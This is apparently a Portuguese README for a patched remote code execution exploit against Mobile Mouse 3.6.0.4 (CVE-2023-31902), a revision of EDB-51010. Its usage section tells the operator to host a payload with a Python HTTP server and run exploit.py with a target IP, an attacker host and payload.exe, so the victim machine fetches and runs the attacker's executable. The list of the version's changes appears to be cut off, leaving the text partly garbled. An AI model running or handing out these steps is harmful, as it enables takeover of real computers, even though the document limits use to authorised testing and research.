
Mobile Mouse 3.6.0.4 - Execução Remota de Código - CVE-2023-31902
Uma versão corrigida do exploit de execução remota de código do Mobile Mouse 3.6.0.4 publicado como EDB-51010.
O exploit original baixa o payload com sucesso, mas pode falhar ao executá-lo porque ambos os estágios usam a mesma conexão TCP.
Esta versão:
Ele também usa sendall(), caminhos do Windows devidamente escapados, timeouts de socket e tratamento básico de erros.
Inicie um servidor HTTP no diretório do payload:
python3 -m http.server 8080
Execute o exploit:
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exe
Este projeto é destinado apenas a testes de segurança autorizados e pesquisa educacional. Não o utilize contra sistemas sem permissão explícita.